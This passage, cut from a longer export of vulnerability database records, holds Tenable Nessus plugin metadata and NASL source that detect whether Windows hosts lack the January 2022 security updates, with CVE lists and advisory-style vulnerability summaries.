value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005106',\n '5005076'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005106, 5005076])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:38", "description": "The remote Windows host is missing security update 5009595 or cumulative update 5009624. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21899, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21864, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21875, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009595: Windows Server 2012 R2 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21875", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009595.NASL", "href": "https://www.tenable.com/plugins/nessus/156624", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156624);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21875\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009595\");\n script_xref(name:\"MSKB\", value:\"5009624\");\n script_xref(name:\"MSFT\", value:\"MS22-5009595\");\n script_xref(name:\"MSFT\", value:\"MS22-5009624\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009595: Windows Server 2012 R2 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009595\nor cumulative update 5009624. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21899, CVE-2022-21900,\n CVE-2022-21905, CVE-2022-21913, CVE-2022-21924,\n CVE-2022-21925)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21862, CVE-2022-21864, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21875,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21903, CVE-2022-21908, CVE-2022-21914,\n CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880, CVE-2022-21904,\n CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850,\n CVE-2022-21851, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009624\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5009595 or Cumulative Update KB5009624.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009624',\n '5009595'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009624, 5009595])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:36", "description": "The remote Windows host is missing security update 5009601 or cumulative update 5009627. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21922)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21857, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21848)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009601: Windows Server 2008 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21897", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009601.NASL", "href": "https://www.tenable.com/plugins/nessus/156625", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156625);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21862\",\n \"CVE-2022-21880\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21897\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\"\n );\n script_xref(name:\"MSKB\", value:\"5009601\");\n script_xref(name:\"MSKB\", value:\"5009627\");\n script_xref(name:\"MSFT\", value:\"MS22-5009601\");\n script_xref(name:\"MSFT\", value:\"MS22-5009627\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009601: Windows Server 2008 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009601\nor cumulative update 5009627. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880, CVE-2022-21904,\n CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850,\n CVE-2022-21851, CVE-2022-21922)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21857, CVE-2022-21862, CVE-2022-21884,\n CVE-2022-21885, CVE-2022-21897, CVE-2022-21903,\n CVE-2022-21908, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21848)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009627\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5009601 or Cumulative Update KB5009627.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009601', '5009627'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009601,5009627])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:56", "description": "The remote Windows host is missing security update 5009585. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21962, CVE-2022-21959, CVE-2022-21963, CVE-2022-21960, CVE-2022-21928, CVE-2022-21874, CVE-2022-21961, CVE-2022-21958, CVE-2022-21893, CVE-2022-21892, CVE-2022-21878, CVE-2022-21851, CVE-2022-21850, CVE-2022-21849, CVE-2022-21922) \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21908, CVE-2022-21903, CVE-2022-21901, CVE-2022-21897, CVE-2022-21885, CVE-2022-21881, CVE-2022-21875, CVE-2022-21873, CVE-2022-21870, CVE-2022-21868, CVE-2022-21867, CVE-2022-21866, CVE-2022-21864, CVE-2022-21862, CVE-2022-21860, CVE-2022-21859, CVE-2022-21857, CVE-2022-21838, CVE-2022-21835, CVE-2022-21834, CVE-2022-21833, CVE-2022-21914, CVE-2022-21895, CVE-2022-21916, CVE-2022-21919, CVE-2022-21871, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n (CVE-2022-21911, CVE-2022-21889, CVE-2022-21890, CVE-2022-21883, CVE-2022-21843, CVE-2022-21848)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009585: Windows 10 LTS 1507 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21878", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21911", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2022-04-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009585.NASL", "href": "https://www.tenable.com/plugins/nessus/156623", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156623);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21878\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21911\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009585\");\n script_xref(name:\"MSFT\", value:\"MS22-5009585\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009585: Windows 10 LTS 1507 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009585. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands. \n (CVE-2022-21962, CVE-2022-21959, CVE-2022-21963,\n CVE-2022-21960, CVE-2022-21928, CVE-2022-21874,\n CVE-2022-21961, CVE-2022-21958, CVE-2022-21893,\n CVE-2022-21892, CVE-2022-21878, CVE-2022-21851,\n CVE-2022-21850, CVE-2022-21849, CVE-2022-21922)\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21908, CVE-2022-21903, CVE-2022-21901,\n CVE-2022-21897, CVE-2022-21885, CVE-2022-21881,\n CVE-2022-21875, CVE-2022-21873, CVE-2022-21870,\n CVE-2022-21868, CVE-2022-21867, CVE-2022-21866,\n CVE-2022-21864, CVE-2022-21862, CVE-2022-21860,\n CVE-2022-21859, CVE-2022-21857, CVE-2022-21838,\n CVE-2022-21835, CVE-2022-21834, CVE-2022-21833,\n CVE-2022-21914, CVE-2022-21895, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21871, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n (CVE-2022-21911, CVE-2022-21889, CVE-2022-21890, \n CVE-2022-21883, CVE-2022-21843, CVE-2022-21848)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009585\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009585\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21874\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 